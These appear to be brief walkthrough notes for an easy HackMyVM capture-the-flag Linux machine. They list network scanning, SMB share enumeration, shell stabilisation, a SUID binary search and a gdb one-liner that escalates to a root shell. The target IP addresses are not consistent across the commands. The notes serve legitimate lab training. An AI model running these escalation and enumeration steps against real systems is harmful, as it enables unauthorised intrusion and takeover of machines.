machine downloaded from https://hackmyvm.eu/
difficulty: Easy
OS: Linux
sudo netdiscover -i eth0 -r 192.168.5.0/24
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -vvv 192.168.5.106
-oN report.txt
Services exposed on ports 22, 80, 139, 445
whatweb 192.168.1.106
crackmapexec 192.168.5.106
smbmap -H 192.168.5.105
smbclient //192.168.5.106/share
script /dev/null -c bash
ctrl + Z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm
cd /home/connection/
cat local.txt
find / -perm -4000 2>/dev/null
/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit